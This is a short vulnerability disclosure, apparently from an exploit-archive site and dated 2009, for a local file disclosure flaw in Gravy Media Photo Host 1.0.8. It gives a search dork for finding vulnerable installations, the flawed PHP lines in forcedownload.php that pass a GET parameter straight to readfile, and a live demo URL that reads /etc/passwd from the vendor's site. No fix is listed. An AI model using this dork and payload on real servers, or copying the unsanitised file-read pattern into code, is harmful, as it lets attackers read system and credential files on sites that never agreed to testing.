Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability

2009-06-22 21:13:19

==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er

====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile("$filename");
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

#

Fixes

No fixes

In order to submit a new fix you need to be registered.